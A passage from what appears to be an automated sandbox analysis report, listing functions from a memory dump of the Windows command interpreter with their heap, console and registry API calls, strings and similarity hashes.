                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 22a7d98d8dd199a207890c586db7b678b92e41d9689320f2b2c8666f7b78c7ea
                                  • Instruction ID: f03c2fd415c952f60ea8f72731e70cefa72a6a376c46de575eb76b95dc75a622
                                  • Opcode Fuzzy Hash: 22a7d98d8dd199a207890c586db7b678b92e41d9689320f2b2c8666f7b78c7ea
                                  • Instruction Fuzzy Hash: D8110831605D2157CB1C6B595C1CB7F2367EF84B10F1A015AE907AB7C4CB219D529690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00160100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,0015EBC3), ref: 00160117
                                  • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0016011E
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00160133
                                  • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0016013A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Process$AllocSize
                                  • String ID:
                                  • API String ID: 2549470565-0
                                  • Opcode ID: e20292e5f52959d89a08b79b00b601378316e8b34c8b8ac31a0d5dbdaf8f9763
                                  • Instruction ID: 463f8d145c26a83e2db04136c7ddbd7a058c9bd19b08b842bf0ba6fbc3e1407e
                                  • Opcode Fuzzy Hash: e20292e5f52959d89a08b79b00b601378316e8b34c8b8ac31a0d5dbdaf8f9763
                                  • Instruction Fuzzy Hash: 930128763012129BD7129F55EC88EAB7768FB99762F210066F50AC6060DB30DC94CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00177DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,0016E18E), ref: 00177E19
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0016E18E), ref: 00177E26
                                  • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0016E18E), ref: 00177E4A
                                  • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,0016E18E), ref: 00177E52
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                  • String ID:
                                  • API String ID: 1033415088-0
                                  • Opcode ID: c80a3e224b63325bbcf53c22d8263fc719b0d5ae03556ae35172697b650e5311
                                  • Instruction ID: 0a725baab9531d4bb57844a6404a6553702917efbec432ec526e7e70621b3aff
                                  • Opcode Fuzzy Hash: c80a3e224b63325bbcf53c22d8263fc719b0d5ae03556ae35172697b650e5311
                                  • Instruction Fuzzy Hash: D501B132A04119AF9B04ABB8AC859FFB7FCEF0D311F10016AF81AD6180EB249D41C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166D00, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                  • String ID:
                                  • API String ID: 1063105408-0
                                  • Opcode ID: ea3f1b06729ee14f3ac41cf7dbedf47524fb895ee29f2379a2024025b7ca719a
                                  • Instruction ID: 1ee031e354260d89cf412eb57f3472277ef88fa518f854f4fe45f4da472a48af
                                  • Opcode Fuzzy Hash: ea3f1b06729ee14f3ac41cf7dbedf47524fb895ee29f2379a2024025b7ca719a
                                  • Instruction Fuzzy Hash: 8B111870604308CBC7259FB0ED4862437B1BB0979AF20466EE45A8A6E1E73689E2DB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00171914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00171735), ref: 00171932
                                  • RtlFreeHeap.NTDLL(00000000,?,?), ref: 00171939
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00171735), ref: 00171957
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0017195E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: ff68a84ac2081d6e66f64c2df40807021f0b070b2f23ea9b5b0a3136130ddaf1
                                  • Instruction ID: 3e8686a747dbd69553e650b71b0f76514a59881f934cf126d50c72c4e5ad9e09
                                  • Opcode Fuzzy Hash: ff68a84ac2081d6e66f64c2df40807021f0b070b2f23ea9b5b0a3136130ddaf1
                                  • Instruction Fuzzy Hash: A2F06872610202AFD7149FA4DC89BA5B7F8FF48326F10452EE645D6440D774E495CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00163DBB), ref: 00163B33
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00163DBB), ref: 00163B3A
                                    • Part of subcall function 00163AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00163A9F), ref: 00163AB2
                                    • Part of subcall function 00163AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00163ACD
                                    • Part of subcall function 00163AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00163AD4
                                    • Part of subcall function 00163AAE: memcpy.MSVCRT ref: 00163AE3
                                    • Part of subcall function 00163AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00163AEC
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00163DBB), ref: 0016DFEA
                                  • RtlFreeHeap.NTDLL(00000000,?,00163DBB), ref: 0016DFF1
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                  • String ID:
                                  • API String ID: 197374240-0
                                  • Opcode ID: 6ed618179b8cd871a425f8975715d277c0d0e834133b23a87191d4a37a2eb83e
                                  • Instruction ID: e2598a8f5abceae362f5c992623584ad3eab9131e53529d41b47450ed4e4d64c
                                  • Opcode Fuzzy Hash: 6ed618179b8cd871a425f8975715d277c0d0e834133b23a87191d4a37a2eb83e
                                  • Instruction Fuzzy Hash: 3BE0127274431267E6203BFD7C0EF8A2A54AB45B72F1140AAFB85CA5C0DE60C98187A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00179897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 001798A3
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00173811,?,?,00000001,?), ref: 001798AB
                                  • _get_osfhandle.MSVCRT ref: 001798C1
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00173811,?,?,00000001,?), ref: 001798C9
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleMode_get_osfhandle
                                  • String ID:
                                  • API String ID: 1606018815-0
                                  • Opcode ID: 1e54401c80b576014c529fc65a1104daf2acdaa706aa6bee06fd0912518ae1a4
                                  • Instruction ID: 237722afdc7f99536debcc514cf19729ffba607bb9c33a4f9dd798ba10598a8f
                                  • Opcode Fuzzy Hash: 1e54401c80b576014c529fc65a1104daf2acdaa706aa6bee06fd0912518ae1a4
                                  • Instruction Fuzzy Hash: 5BE012B1904209ABEB109BB5DC0EAA9776CFB01311F14054AF925C65D1EA719A449660
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00164C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00164C19
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00164C21
                                  • _get_osfhandle.MSVCRT ref: 00164C2F
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00164C37
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleMode_get_osfhandle
                                  • String ID:
                                  • API String ID: 1606018815-0
                                  • Opcode ID: 34aa8f114879334f028980ec7a3ff0f8806fb8b88ff94412ba9e7b205cd6bd6f
                                  • Instruction ID: ea65070f535ef8ab5862141996473c6a6dab44f6625b446bb9e6ee7b11d0a311
                                  • Opcode Fuzzy Hash: 34aa8f114879334f028980ec7a3ff0f8806fb8b88ff94412ba9e7b205cd6bd6f
                                  • Instruction Fuzzy Hash: BCE0B6B2904200EFDB189FB4FC0DA547BB9F709B01B080A0EF52183AA1DB719790DB10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015ACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0015ACAB), ref: 0015ACDE
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0015ACE5
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0015ACEE
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0015ACF5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 1a45373a5c03148805d93c9e6d2d06efe986d5077d56fc91bc103dd17c27a4e1
                                  • Instruction ID: e72445e790213aaa66d68700a4914f8be2b76621599673b628cf6b8acfe3e7e8
                                  • Opcode Fuzzy Hash: 1a45373a5c03148805d93c9e6d2d06efe986d5077d56fc91bc103dd17c27a4e1
                                  • Instruction Fuzzy Hash: 07D0C972404111ABEB503BE8BC0EFCA3E28FF4D332F0104ABF645824608AB188C08B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00159429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                    • Part of subcall function 0015D7D4: wcschr.MSVCRT ref: 0015D7DA
                                    • Part of subcall function 0015EEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,0015E5F6,?,00000000,00000000,00000000), ref: 0015EF39
                                    • Part of subcall function 0015EEF0: RtlFreeHeap.NTDLL(00000000,?,0015E5F6), ref: 0015EF40
                                    • Part of subcall function 0015EEF0: _setjmp3.MSVCRT ref: 0015EFA5
                                  • _wcsupr.MSVCRT ref: 00170A16
                                    • Part of subcall function 00162ABE: memset.MSVCRT ref: 00162B59
                                    • Part of subcall function 00162ABE: ??_V@YAXPAX@Z.MSVCRT ref: 00162C13
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                  • String ID: FOR$ IF
                                  • API String ID: 3818062306-2924197646
                                  • Opcode ID: 2be1a21d7700fb05e435bc17ae525b46bba7c86bb2f1f3dca78454c93bbd041d
                                  • Instruction ID: 2b306b0682c16a43c00ce2c007f1c6689267cd6123c6f102d9647ef1f45d0818
                                  • Opcode Fuzzy Hash: 2be1a21d7700fb05e435bc17ae525b46bba7c86bb2f1f3dca78454c93bbd041d
                                  • Instruction Fuzzy Hash: C0512A35700302DADB266B28895177B32B2EFA8719F158029ED5A8F691FF71DE85C381
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017B2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • wcschr.MSVCRT ref: 0017B377
                                  • memcpy.MSVCRT ref: 0017B3F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$AllocProcessmemcpywcschr
                                  • String ID: &()[]{}^=;!%'+,`~
                                  • API String ID: 3241892172-381716982
                                  • Opcode ID: 25604d71539fc172706108461ae0234ab564c5f23197f1cc09234813f6954b3c
                                  • Instruction ID: 21b86deae8a3f24966c57ae9fc9f08f37222c197ba58457d35130b58b4957abb
                                  • Opcode Fuzzy Hash: 25604d71539fc172706108461ae0234ab564c5f23197f1cc09234813f6954b3c
                                  • Instruction Fuzzy Hash: 6C614D70E08219DFCB18CF69E8D06ADB7F1FF58314B25812EE81AE7651DB709981CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015DE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcsicmp.MSVCRT ref: 0015DE60
                                    • Part of subcall function 0015F300: _setjmp3.MSVCRT ref: 0015F318
                                    • Part of subcall function 0015F300: iswspace.MSVCRT ref: 0015F35B
                                    • Part of subcall function 0015F300: wcschr.MSVCRT ref: 0015F37D
                                    • Part of subcall function 0015F300: iswdigit.MSVCRT ref: 0015F3DE
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • longjmp.MSVCRT(0018B8B8,00000001,00000000), ref: 0016BCF2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                  • String ID: REM/?
                                  • API String ID: 1631155197-4093888634
                                  • Opcode ID: 63afcda3850157544dc48f1de4bef7f5eadad0b05b168d348c8790e8e6def88d
                                  • Instruction ID: 464153b3e049d17766e4f05490dd4f4ea40e2a8ab4410275ec0fb70459d0d5c8
                                  • Opcode Fuzzy Hash: 63afcda3850157544dc48f1de4bef7f5eadad0b05b168d348c8790e8e6def88d
                                  • Instruction Fuzzy Hash: 8C219032354300DAE778AB35AD46B2B2295DFA0762F10443FE916CF5D1EFA0898A8701
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0017C120,0000001C,00175CB1), ref: 00174A58
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EAB7
                                    • Part of subcall function 0015EA40: iswspace.MSVCRT ref: 0015EB2D
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB49
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB6D
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00174B28
                                    • Part of subcall function 0017587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 001758AF
                                    • Part of subcall function 0017587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0), ref: 001758E5
                                    • Part of subcall function 0017587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 001758F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$Close$CreateOpenValueiswspace
                                  • String ID: Software\Classes
                                  • API String ID: 1047774138-1656466771
                                  • Opcode ID: 99bd08b5aa049532f1f82f57b2791f9cff09b6f83be4bc3027b1b229da33b440
                                  • Instruction ID: 2586481e704bfa149818f94f73aae1c6193ea80ccaac5e516a51678b467526b7
                                  • Opcode Fuzzy Hash: 99bd08b5aa049532f1f82f57b2791f9cff09b6f83be4bc3027b1b229da33b440
                                  • Instruction Fuzzy Hash: 3A318571F44214DBDF18EFF9D8516ADB6B2EF58741F24802EE416BB291EB708D008B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001751C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0017C0C0,0000001C,00175CE1), ref: 001751F4
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EAB7
                                    • Part of subcall function 0015EA40: iswspace.MSVCRT ref: 0015EB2D
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB49
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB6D
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001752BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$CloseOpeniswspace
                                  • String ID: Software\Classes
                                  • API String ID: 2439148603-1656466771
                                  • Opcode ID: 7177f240f20ac86744931da12523fd3227b7f5301400c9e680cc70c31fbf5c87
                                  • Instruction ID: 6ccceb9324421f6f43b93bd634f0228cb163df512cd2a00e32138cb9eb7fa6af
                                  • Opcode Fuzzy Hash: 7177f240f20ac86744931da12523fd3227b7f5301400c9e680cc70c31fbf5c87
                                  • Instruction Fuzzy Hash: DD218971E04705DBDF18AFF8D8515AD76B2AF98700F20C01DE81ABB296EBB04D018B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0016100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00160B7F), ref: 0016CDDF
                                  • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0016CE81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleTitle
                                  • String ID: -
                                  • API String ID: 3358957663-3695764949
                                  • Opcode ID: 5687387ab763836be356e66eef84b4a70b391ef80e9f18e5e9d2e4699429d6d8
                                  • Instruction ID: 70ce92dcbe86188947e667a94cbc24bf1d12380aa93e40b211f85af2b332f051
                                  • Opcode Fuzzy Hash: 5687387ab763836be356e66eef84b4a70b391ef80e9f18e5e9d2e4699429d6d8
                                  • Instruction Fuzzy Hash: 0B213232A00140ABCB29AB6CDC557BF7BB6AB84750F1D812DF80697354EF319D968BC1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00178430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00178459
                                  • printf.MSVCRT ref: 001784B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                  • String ID: %3d
                                  • API String ID: 2845598586-2138283368
                                  • Opcode ID: 3a9691288aad46e5754225ecf6e38fd9b2a69eca68ac96f6e73c67233ee0c6e9
                                  • Instruction ID: 30b84dd5156f5172e02d8b67c72b2f7204cb60aee1d603a5431ed37393a58539
                                  • Opcode Fuzzy Hash: 3a9691288aad46e5754225ecf6e38fd9b2a69eca68ac96f6e73c67233ee0c6e9
                                  • Instruction Fuzzy Hash: D801FE71640204FFEB206E559C8AFDB3ABDDB95BA1F008015FE1C691C1DBB19C60C1B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00160C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001672B5: __EH_prolog3_catch.LIBCMT ref: 00167650
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                  • memset.MSVCRT ref: 00160CDD
                                  Strings
                                  • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0016CD51
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: H_prolog3_catchmemset
                                  • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                  • API String ID: 620422817-3416068913
                                  • Opcode ID: d3fb96d9f62c2d2ed60fd825f4a0c36f0e32602ceabc815f319e4d7fa406d11c
                                  • Instruction ID: 5dcf12f4fd6528ab659932d971e0976d774a51224ff705e0843ea03d93796e8c
                                  • Opcode Fuzzy Hash: d3fb96d9f62c2d2ed60fd825f4a0c36f0e32602ceabc815f319e4d7fa406d11c
                                  • Instruction Fuzzy Hash: 3601FC723003049BD7215679DC49B6BB2D9EB94350F14463EF95ADB241DBB6EC50C2A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015DEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: iswspacewcschr
                                  • String ID: =,;
                                  • API String ID: 287713880-1539845467
                                  • Opcode ID: 0491627b8258092761b11fc37a9ae43683831c0d1d8627dea9382f6c5aaec1b4
                                  • Instruction ID: 8018746e3a2837765baa24409420ad36f0cfeb4b8cfddc8c1e60ed7d71f33e2b
                                  • Opcode Fuzzy Hash: 0491627b8258092761b11fc37a9ae43683831c0d1d8627dea9382f6c5aaec1b4
                                  • Instruction Fuzzy Hash: 75E04837608511D247340A5EBC0946756D9DBD6B23327001FFC239F550E7518C4B9391
                                  Uniqueness

                                  Uniqueness Score: -1.00%